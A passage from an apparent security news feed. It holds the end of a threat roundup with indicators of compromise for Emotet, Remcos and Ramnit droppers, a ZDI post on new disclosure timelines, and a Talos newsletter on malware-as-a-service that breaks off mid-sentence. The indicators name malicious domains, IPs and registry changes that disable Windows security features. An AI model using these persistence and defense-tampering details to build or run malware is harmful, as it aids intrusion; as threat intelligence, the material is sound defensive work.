<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE Value Name: Type  22 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE Value Name: Start  22 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND Value Name: Start  21 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}  18 Mutexes Occurrences kkq-vx_mtx63 23 kkq-vx_mtx64 23 kkq-vx_mtx65 23 kkq-vx_mtx66 23 kkq-vx_mtx67 23 kkq-vx_mtx68 23 kkq-vx_mtx69 23 kkq-vx_mtx70 23 kkq-vx_mtx71 23 kkq-vx_mtx72 23 kkq-vx_mtx73 23 kkq-vx_mtx74 23 kkq-vx_mtx75 23 kkq-vx_mtx76 23 kkq-vx_mtx77 23 kkq-vx_mtx78 23 kkq-vx_mtx79 23 kkq-vx_mtx80 23 kkq-vx_mtx81 23 kkq-vx_mtx82 23 kkq-vx_mtx83 23 kkq-vx_mtx84 23 kkq-vx_mtx85 23 kkq-vx_mtx86 23 kkq-vx_mtx87 23 *See JSON for more IOCs IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 107[.]22[.]125[.]105 7 3[.]217[.]206[.]46 4 Domain Names contacted by malware. Does not indicate maliciousness Occurrences ninite[.]com 21 www[.]bing[.]com 1 Files and or directories created Occurrences %CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 23 %CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 23 %ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 23 %ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 23 %SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 23 %SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 23 %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 23 %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 23 %System32%\FXSSVC.exe 23 %System32%\alg.exe 23 %System32%\dllhost.exe 23 %SystemRoot%\ehome\ehsched.exe 23 %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log 23 %SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log 23 %SystemRoot%\SysWOW64\dllhost.exe 23 %SystemRoot%\SysWOW64\svchost.exe 23 %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log 23 %SystemRoot%\SysWOW64\dllhost.vir 23 %SystemRoot%\SysWOW64\svchost.vir 23 %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat 23 %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock 23 %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat 23 %SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.lock 23 %SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngenservicelock.dat 23 %CommonProgramFiles(x86)%\microsoft shared\source engine\ose.vir 23 *See JSON for more IOCs #### File Hashes  137ad3b55addd7191c8c974beef6b65bae791bc4de1e86b7e2965b311d40e2d0 1cfd0fd601a0f5234ce72672ec9c6c866dca03836198d93a320ed5df0bddd7f8 1e831b6d0cabaa8b44de36c1b96dd6e54e295502eb171be4f87723212fe574ca 1f935627d9866da115f1aad78be290f60a639bec1a94d6b8397326eeb46c111b 30ffb87628211e78074a3a891b8bd173db6f2d74dc97e735ff386361cf29aee1 3f948d4350c566416101441adb1c00121bd835db40cc08c73a556b764458673d 47934d4f40e9a5af0ee572a7e1e088d29d3bfd655d4aff26018a64118ad68a24 563c16cb752614726d350000fbf514a8b8d32a8074cd12c7545d6ff93f790ed9 591ae4985fd6993f580eae6f93f3e96f7c73c14dc3927e96223e8003f9ab3588 5cbd454095120231e23ca372fee8e9e76f34e3f5491f8ab10e8e5203e4c52570 6f0f5fda67646bc8def9c66497041528cd8ed7158a169c1b0787f59360c28ea8 7ec4a0246b5d33dfe811f4f34ab94a6b82d822196776afbe28a0f543ade8ad63 97d0aeeca4859c38984086ff1bef13c9bd11466131058fabda20dd1b21342f7a a2839faa3c7ecbff8afa71ca5787690e0e3eaeb36b899bab1926b19ce32b8c6d bcf2ae9a67fe974c02e95fbdd4edcce7df377a288c7586dae9d0b625aeedc93b c51d235b290424ad6baf08d67ab600a260200846a3f4b218e916933594b40537 d3d7dd910bd5e79fdb39d51aa83afaccdfd10538d30dd69bc7219a146e897361 d445c1ac4afae6cb028a2508c655271e3d69e07d9e016887d89d790c80fc0409 e23566aabaa7743da973840338829cc25d6936e8fcb5fb8d9b78b0ccac46c1ea e37b0661d4e4483048abcf0abba65060c78716672790e12bb0a768f04b18134b e48a371f7f5f3ad1cda0d16312f30846b6a12494967c8fba8de7f65a5673b1ff eb1ecc1ef099105b4882ccace3caf843ed1508b1463f8af6cc94adaa0181b721 ec1bc44db50911234444c575d91335113232ab5b1f6cad6acf5e52ff16ccd8fb  #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella N/A WSA N/A #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Dropper.Emotet-9961142-0 #### Indicators of Compromise • IOCs collected from dynamic analysis of 218 samples Registry Keys Occurrences <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: LanguageList  190 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: Type  64 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: Start  64 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: ErrorControl  64 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: DisplayName  64 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: WOW64  64 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: ObjectName  64 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>  63 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: ImagePath  61 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> Value Name: Description  60 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%systemroot%\system32\dot3svc.dll,-1103  14 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @oleres.dll,-5013  10 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%systemroot%\system32\browser.dll,-101  9 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\AxInstSV.dll,-104  9 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%systemroot%\system32\dps.dll,-501  9 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\ehome\ehrecvr.exe,-102  8 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @appmgmts.dll,-3251  8 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpcore.dll,-101  8 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%systemroot%\system32\appinfo.dll,-101  8 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\System32\audiosrv.dll,-205  7 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%systemroot%\system32\appidsvc.dll,-101  7 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @comres.dll,-948  7 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\System32\dnsapi.dll,-102  7 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%systemroot%\system32\cscsvc.dll,-201  7 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\System32\bthserv.dll,-102  7 IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 5[.]196[.]74[.]210 82 74[.]208[.]45[.]104 82 45[.]55[.]219[.]163 82 45[.]55[.]36[.]51 82 174[.]45[.]13[.]118 82 180[.]92[.]239[.]110 82 91[.]83[.]93[.]99 82 217[.]199[.]160[.]224 78 89[.]32[.]150[.]160 78 68[.]183[.]190[.]199 78 45[.]161[.]242[.]102 78 209[.]236[.]123[.]42 78 71[.]197[.]211[.]156 78 91[.]121[.]54[.]71 78 85[.]25[.]207[.]108 58 88[.]249[.]181[.]198 58 65[.]156[.]53[.]186 58 68[.]183[.]233[.]80 58 177[.]32[.]8[.]85 58 81[.]17[.]93[.]134 58 197[.]232[.]36[.]108 58 23[.]46[.]150[.]72 30 23[.]46[.]150[.]48 27 23[.]221[.]72[.]27 13 23[.]221[.]72[.]10 6 *See JSON for more IOCs Domain Names contacted by malware. Does not indicate maliciousness Occurrences apps[.]identrust[.]com 82 Files and or directories created Occurrences %SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 35 %SystemRoot%\SysWOW64\printui 2 %SystemRoot%\SysWOW64\NlsLexicons0414 2 %SystemRoot%\SysWOW64\utildll 2 %SystemRoot%\SysWOW64\NlsData000a 2 %SystemRoot%\SysWOW64\fthsvc 2 %SystemRoot%\SysWOW64\shlwapi 2 %SystemRoot%\SysWOW64\WcsPlugInService 2 %SystemRoot%\SysWOW64\NlsLexicons0002 2 %SystemRoot%\SysWOW64\d3d8thk 1 %SystemRoot%\SysWOW64\instnm 1 %SystemRoot%\SysWOW64\cttune 1 %SystemRoot%\SysWOW64\tsbyuv 1 %SystemRoot%\SysWOW64\KBDSW 1 %SystemRoot%\SysWOW64\fc 1 %SystemRoot%\SysWOW64\rshx32 1 %SystemRoot%\SysWOW64\KBDHE220 1 %SystemRoot%\SysWOW64\WMADMOE 1 %SystemRoot%\SysWOW64\NlsData0002 1 %SystemRoot%\SysWOW64\iprop 1 %SystemRoot%\SysWOW64\rastls 1 %SystemRoot%\SysWOW64\aecache 1 %SystemRoot%\SysWOW64\SMBHelperClass 1 %SystemRoot%\SysWOW64\KBDNO 1 %SystemRoot%\SysWOW64\mfc100 1 *See JSON for more IOCs #### File Hashes  0154a4e3faa4dafca324954364d049324d6fcc6b8a1c90cbae92cd41f8927c4e 01ea88880d59cd617d53bfd1849ad0c2023c9febc43b48579d06802c9b324d77 0222be0813e32c7a2c87a31482e33830a91b73a750aff3499da5caa100646607 0242673f6b5b086a61873f4773b8b7f119d025325f2724cb362b1151adccfc8b 02f7999d6693f08f5983effb8bee06145be3f7dc22ff1e5b745e8d0633fe19d6 038008283ccba00047b767169fd02554182310d7b32c6def8a3fc1c6a045daf1 0403b01de17d2130faa4eecf11111acf15bc672dfeb9394054e5aa05166b8289 044242411968ca1c92b3a645d7f470cf0cda1a220920da688558fde7f4108eb9 055014bbf3a21173e4e2d9fb22124d7d249bc8f8c748151197d6e985bdf06f67 05cf33a7202716161360fc0e6fd45091f9a290954ba26a64037745652fa4b487 066202dc95bd51220d42f603a030ef71527b8dc56e62200f0d175f09f3f89c27 06ee8bc6b3c35b3d3ea924f73db6da1df9061e69b487bad9718328f1d186f0c7 0780d91df0f27af4b00d51e531a1cf12d50bbb048a211e0b287820bd9313eab5 07c262357505c7bef31ebfe2bb6c13a3d386e38d262ba2bdbfb2e52c1bd066fd 080fc908405201cbf074d6343acf66ee3c4d57f231c399b87097f75b8ca7960f 08e6bfa50d4fe544c03474d1a23776762a47a0ceed44dbe5bbb6e09fce30b055 091b50c4a374f1fc1d15e81044c2b50f03fa7c3e8359eb09bb95dc25deeebd4d 098861c8b4411225b4fde8737ccb518052ef40c896ee4e42dfeecf322e56f07f 09c4a4a31a51590b27a82bcff450c29391d3dfde480df012f43020e858efb639 0b533cf67e6fd8298b62d3aaea82f07ad11c600fa8917f3b683a72da9ca2fa7e 0c33a1f3687e65daa8825856f309cc40ef97d0892ef7742a77355124e296b815 0ccab31b5610aac24a242c812f474ff24b8e345aa78fd4b7d0a92b690938f908 0cd25d45a5e31de0fc1b75ba65c5b43d934b60b7d07638aaa1ce0d83afd984ec 0d3fee19509a873e96a1b2559d9193cf046f7f35f49d16b180438d9df7da027f 0ea6a45d2ad1115ce7141f15693139b8bd9e5ffebb5a1321ab8c48e62d65fab9  *See JSON for more IOCs #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella N/A WSA #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Dropper.Remcos-9961392-0 #### Indicators of Compromise • IOCs collected from dynamic analysis of 14 samples Registry Keys Occurrences <HKCU>\SOFTWARE\POULUS  14 <HKCU>\SOFTWARE\POULUS\MICROMINIATURISER  14 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\BRUGERNAVNETS  14 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\BRUGERNAVNETS\TIVOLIET  14 <HKCU>\SOFTWARE\POULUS\MICROMINIATURISER Value Name: Komplettes  14 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\BRUGERNAVNETS\TIVOLIET Value Name: Fins  14 <HKCU>\SOFTWARE\[email protected]  7 <HKCU>\SOFTWARE\[email protected] Value Name: licence  7 <HKCU>\SOFTWARE\[email protected] Value Name: exepath  7 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: ornamenterne  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: Hyldetrs  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: lnglidninger  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: Vampirebat  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: Dereferencing  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: Sarkastisk  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: Martyrologistic  1 Mutexes Occurrences Remcos_Mutex_Inj 7 [email protected] 7 Global\916138a1-15e4-11ed-9660-00151792685a 1 IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 5[.]2[.]75[.]164 7 181[.]235[.]13[.]200 4 186[.]169[.]54[.]97 3 Domain Names contacted by malware. Does not indicate maliciousness Occurrences colpatvalidacionnuevo[.]xyz 7 Files and or directories created Occurrences %HOMEPATH%\Desktop\Markedness.ini 14 %TEMP%\ns<random, matching '[a-z][A-F0-9]{1,4}'>.tmp 14 %TEMP%\ns<random, matching '[a-z][A-F0-9]{4}'>.tmp\System.dll 14 %TEMP%\logsflat458 7 %TEMP%\logsflat458\sasgs527.dat 7 \TEMP\en-US\22d69844486d029467b528c89bf763a6.exe.mui 1 \TEMP\en-US\ef6731323cff411f303c2bd29b9f15c8.exe.mui 1 \TEMP\en-US\b2a7538d257a51b1a506b646c248fcbe.exe.mui 1 \TEMP\en-US\570979659276a2a985f97f7965f97f76.exe.mui 1 \TEMP\en-US\f231d436f8d62de3082ea791da78ed50.exe.mui 1 \TEMP\en\f231d436f8d62de3082ea791da78ed50.exe.mui 1 \TEMP\en\ef6731323cff411f303c2bd29b9f15c8.exe.mui 1 %TEMP%\Selenitic 1 %TEMP%\Dextroamphetamine 1 %TEMP%\Selenitic\Uncooping.exe 1 %TEMP%\Dextroamphetamine\Lobcokt.exe 1 \TEMP\en\22d69844486d029467b528c89bf763a6.exe.mui 1 %TEMP%\Tiki124 1 %TEMP%\Tiki124\Unexpecting.exe 1 \TEMP\en\b2a7538d257a51b1a506b646c248fcbe.exe.mui 1 \TEMP\en\570979659276a2a985f97f7965f97f76.exe.mui 1 %TEMP%\Sekundrkommunens 1 %TEMP%\Giganter27 1 %TEMP%\Sekundrkommunens\Unpracticability174.exe 1 %TEMP%\Giganter27\Spandauerne.exe 1 *See JSON for more IOCs #### File Hashes  125b94822affbd4b1b67333905a91231c62e427334475ada0daa44d007e884c1 332cb82247db85cd4c772200938a7623c4161a15d680157cdc688b53aae2303a 3efb2166b220fd7d7e5df42739d998f6ed4c70fefdcb03b6a9b1810d6dcfcd77 42d77fbb29467078ade8ecba705a648d3d4aeacd5f6735a6d92d17cb55ff7049 6761e346725d0cfa3436b459176ff467f7b4a426af0559845032c912420747cd 72d9be63e832a89a04ffcfb48c30199d3461fe982bde962f57c7cf71e0f5f06a 8c420a6337376e20c987679a34e3d09194e504c444fbf50619328f5c0dda9217 942dcafe7a16cfdd1769048c73590ec2c29e9c76a9f6c46e6b6e88ac2220b0ef 9ead44844a24092afb456478686839852e04cd1ad8e081185ae432f1171baa1b a3ec71d27779875c7262d608c3c5e591fa7c12f0893e006bb6f7d2ad1d710142 a742e0a1f7939fdaf5eb615bac3da040781bd19e84e3f647186314ecb6e0fa5e ce2ff79b4178d9b7f142001bc227753dd395fcd1a28a385bfa379e0857181467 d52c22336b2e2efaeab6b8eb2be8726a36eaea553905b01102d9716d4c6184af e2deccb5d8cc1ec270d95501aaa7e53951bd7f89c2c0bcd50420bf94b7057675  #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella WSA #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Dropper.Ramnit-9961396-0 #### Indicators of Compromise • IOCs collected from dynamic analysis of 26 samples Registry Keys Occurrences <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: AntiVirusOverride  26 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: AntiVirusDisableNotify  26 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: FirewallDisableNotify  26 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: FirewallOverride  26 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: UpdatesDisableNotify  26 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: UacDisableNotify  26 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: EnableLUA  26 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE Value Name: EnableFirewall  26 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE Value Name: DoNotAllowExceptions  26 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE Value Name: DisableNotifications  26 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC Value Name: Start  26 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND Value Name: Start  26 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC Value Name: Start  26 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION Value Name: jfghdug_ooetvtgk  26 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: JudCsgdy  26 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV Value Name: Start  26 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Windows Defender  26 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON Value Name: Userinit  26 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON Value Name: Userinit  26 Mutexes Occurrences qazwsxedc 26 {7930D12C-1D38-EB63-89CF-4C8161B79ED4} 26 IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 72[.]26[.]218[.]70 25 195[.]201[.]179[.]207 25 208[.]100[.]26[.]245 25 46[.]165[.]220[.]155 25 35[.]205[.]61[.]67 25 142[.]250[.]80[.]14 25 63[.]251[.]235[.]76 25 64[.]225[.]91[.]73 25 Domain Names contacted by malware. Does not indicate maliciousness Occurrences google[.]com 25 gjvoemsjvb[.]com 25 ahpygyxe[.]com 25 msoalrhvphqrnjv[.]com 25 rdslmvlipid[.]com 25 jpcqdmfvn[.]com 25 rrmlyaviljwuoph[.]com 25 maajnyhst[.]com 25 enbbojmjpss[.]com 25 oqmfrxak[.]com 25 tdccjwtetv[.]com 25 tpxobasr[.]com 25 xpdsuvpcvrcrnwbxqfx[.]com 25 fbrlgikmlriqlvel[.]com 25 boeyrhmrd[.]com 25 ugcukkcpplmouoah[.]com 25 gugendolik[.]com 25 Files and or directories created Occurrences %LOCALAPPDATA%\bolpidti 26 %LOCALAPPDATA%\bolpidti\judcsgdy.exe 26 %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe 26 #### File Hashes  081742e8ed56a1a933e0507ccd536aaaf7242ac76d47a1a49626ee71c6756b53 0e372167303e500219b580a1a0367d2b69ab693e56934584e05cd963736bd463 10cef31349a4842546edbc5244d0d3aaed1e3c058008800c889abf5dc43ec343 127ee9c2897fb600dec742861451fdcf48820c200e15df7479542ed4232c0584 155b0301ce2f88c396fb7aa77cbc82c51a01660e6a74b63f7ba8dc8f023ea7e8 1e1773938b5bdd08be479ca9186a30d3fad83ea67ae905f391508ac543c2a38f 263351025d462b47660ea4bacd71ae1fd694de45a3d9bd5b14e58be1c4362d00 2e2ac92783031efdde48674b0ed3362c81fac9b25756ee39af1629f39309ccc2 340833674362d0c01995cc8657a95a628fddeb853272b6d89dfcf98bbe106cbe 39b9cfa59e688e1d56e6499b80637f321f777d022dff4a9eaf691ba9a1e9cc86 3cc065b26f54c993606649d1679bca81068c10e3727fdf9ee811fa6a17c1ebad 41b21c4398fa089007a9a34aac8a3f5d14b61814ff036b555cc6b09c8efd81aa 4b183d215f86d026ef2bac0cf5dd4b28146612d52206e358169b0f1d3209c76d 4ed2cf991c4ed810cdbb5d567d33e1f1d94218ae43c506d6b33d2acc35009598 57fa2ea50d27a8cc8feec2867a680ae6e9a0d1a47d117733a73db86da3bf8416 5de59e2cc183ce5f34b2ca66fbd1edce54b3a6208ae7621c49cbd78835bdcbf5 699e006e4a6871ca898aacf55f84c36ea43d8b9e421b71dd20a0fe5a06378d66 6a216904abbf52246819029936c7e8705f50c61ba0ee6a62d8a14881cfca0a33 77aeccd3d538a6effc3623344a331d5190c747489a5cc511d4e7d973e879ff8a 77c966ca4088e8b918b4e40ed539a510fad2a2631ff17d1a1b01a1670e6fa400 79622d5b5ef3c93d32bcaaba64cfbbe4a88ec7f56d1f7f2160b9219321058f29 8c878b6608dba85c650ffda157cc14d885f14559e8c6b38a5ae0be85d5a73001 8d5f17bf76258cf83d0678cef645b0fa2f0b6df56858fb0ec4cab8894b59b316 a1574bfff6cebf0757ab5a7fc7634b7956fed8943e088b87820ff13be65789c4 af0aa7289a5770da3a158d0f0fbea1c5073b6ca4f6fe5a7bebdde44a55ca2c2e  *See JSON for more IOCs #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella WSA #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK # New Disclosure Timelines for Bugs Resulting from Incomplete Patches 11 August 2022 at 19:00 Today at the Black Hat USA conference, we announced some new disclosure timelines. Our standard 120-day disclosure timeline for most vulnerabilities remains, but for bug reports that result from faulty or incomplete patches, we will use a shorter timeline. Moving forward, the ZDI will adopt a tiered approach based on the severity of the bug and the efficacy of the original fix. The first tier will be a 30-day timeframe for most Critical-rated cases where exploitation is detected or expected. The second level will be a 60-day interval for Critical- and High-severity bugs where the patch offers some protections. Finally, there will be a 90-day period for other severities where no imminent exploitation is expected. As with our normal timelines, extensions will be limited and granted on a case-by-case basis. Since 2005, the ZDI has disclosed more than 10,000 vulnerabilities to countless vendors. These bug reports and subsequent patches allow us to speak from vast experience when it comes to the topic of bug disclosure. Over the last few years, we’ve noticed a disturbing trend – a decrease in patch quality and a reduction in communications surrounding the patch. This has resulted in enterprises losing their ability to accurately estimate the risk to their systems. It’s also costing them money and resources as bad patches get re-released and thus re-applied. Adjusting our disclosure timelines is one of the few areas that we as a disclosure wholesaler can control, and it’s something we have used in the past with positive results. For example, our disclosure timeline used to be 180 days. However, based on data we tracked through vulnerability disclosure and patch release, we were able to lower that to 120 days, which helped reduce the vendor’s overall time-to-fix. Moving forward, we will be tracking failed patches more closely and will make future policy adjustments based on the data we collect. Another thing we announced today is the creation of a new Twitter handle: @thezdibugs. This feed will only tweet out published advisories that are either a high CVSS, 0-day, or resulting from Pwn2Own. If you’re interested in those types of bug reports, we ask that you give it a follow. We’re also now on Instagram, and you can follow us there if you prefer that platform over Twitter. Looking at our published and upcoming bug reports, we are on track for our busiest year ever – for the third year in a row. That also means we’ll have plenty of data to look at as we track incomplete or otherwise faulty patches, and we’ll use this data to adjust these timelines as needed based on what we are seeing across the industry. Other groups may have different timelines, but this is our starting point. With an estimated 1,700 disclosures this year alone, we should be able to gather plenty of metrics. Hopefully, we will see improvements as time goes on. Until then, stay tuned to this blog for updates, subscribe to our YouTube channel, and follow us on Twitter for the latest news and research from the ZDI. New Disclosure Timelines for Bugs Resulting from Incomplete Patches # Threat Source newsletter (Aug. 11, 2022) — All of the things-as-a-service 11 August 2022 at 18:00 By Jon Munshaw. Welcome to this week’s edition of the Threat Source newsletter. Everyone seems to want to create the next “Netflix” of something. Xbox’s Game Pass is the “Netflix of video games.” Rent the Runway is a “Netflix of fashion” where customers subscribe to a rotation of fancy clothes. And now threat actors are looking to be the “Netflix of malware.” All categories of malware have some sort of "as-a-service" twist now. Some of the largest ransomware groups in the world operate “as a service,” allowing smaller groups to pay a fee in exchange for using the larger group’s tools. Our latest report on information-stealers points out that “infostealers as-a-service" are growing in popularity, and our researchers also discovered a new “C2 as-a-service" platform where attackers can pay to have this third-party site act as their command and control. And like Netflix, this Dark Utilities site offers several other layers of tools and malware to choose from. This is a particularly scary trend to me because of how easy — relatively speaking — this makes things for anyone with a basic knowledge of computers to carry out a cyber attack. Netflix made it easy for people like my Grandma to find everything she needs in one place to watch anything from throwback shows like “Night Rider” to the live action of “Shrek: The Musical” and everything in between. How much longer before anyone with access to the internet can log into a singular dark web site and surf for whatever they’re in the mood for that day? As someone who has spent zero time on the actual dark web, this may already exist and I don’t even know about it, but maybe a threat actor will one day be smart enough to make a website that looks as sleek as Netflix so you can scroll through suggestions and hand-pick the Redline information-stealer followed up by a relaxing evening of ransomware from Conti. With everything going “as a service” it means I don’t necessarily have to have the coding skills to create my own bespoke malware. So long as I have the cash, I could conceivably buy an out-of-the-box tool online and deploy it against whoever I want. This is not necessarily as easy as picking a show on Netflix. But it’s not a huge leap to look at the skills gap Netflix closes by allowing my Grandma to surf for any show she wants without having to scroll through cable channels or drive to the library to check out a DVD, and someone who knows how to use PowerShell being able to launch an “as-a-service" ransomware attack. I have no idea what the easy solution is here aside from all the traditional forms of detection and prevention we preach. Outside of direct law enforcement intervention, there are few ways to take these “as a service” platforms offline. Maybe that just means we need to start working on the “Netflix of cybersecurity tools.” ## The one big thing Historically, cybercrime was considered white-collar criminal behavior perpetrated by those that were knowledgeable and turned bad. Now, technology has become such an integral part of our lives that anyone with a smartphone and desire can get started in cybercrime. The growth of cryptocurrencies and associated anonymity, whether legitimate or not, has garnered the attention of criminals that formerly operated in traditional criminal enterprises and have now shifted to cybercrime and identity theft. New research from Talos indicates that small-time criminals are increasingly taking part in online crime like phishing, credit card scams and more in favor of traditional “hands-on” crime. ### Why do I care? Everyone panics when the local news shows a graph with “violent crime” increasing in our respective areas. So we should be just as worried about the increase in cybercrime over the past few years, and the potential for it to grow. As mentioned above, “as a service” malware offerings have made it easier for anyone with internet access to carry out a cyber attack and deploy ransomware or just try to scam someone out of a few thousand dollars. ### So now what? Law enforcement, especially at the local level, is going to need to evolve along with the criminals as they are tasked with protecting the general public. The future criminal is going to be aware of operational security and technologies like Tor to make their arrests increasingly difficult. This is just as good a time as any to remember to talk to your family about cybersecurity and internet safety. Remind family members about common types of scams like the classic “I’m in the hospital and need money.” ## Other news of note Microsoft Patch Tuesday was headlined by another zero-day vulnerability in the Microsoft Support Diagnostics Tool (MSDT). CVE-2022-35743 and CVE-2022-34713 are remote code execution vulnerabilities in MSDT. However, only CVE-2022-34713 has been exploited in the wild and Microsoft considers it “more likely” to be exploited. MSDT was already the target of the so-called “Follina” zero-day vulnerability in June. In all, Microsoft patched more than 120 vulnerabilities across all its products. Adobe also released updates to fix 25 vulnerabilities on Tuesday, mainly in Adobe Acrobat Reader. One critical vulnerability could lead to arbitrary 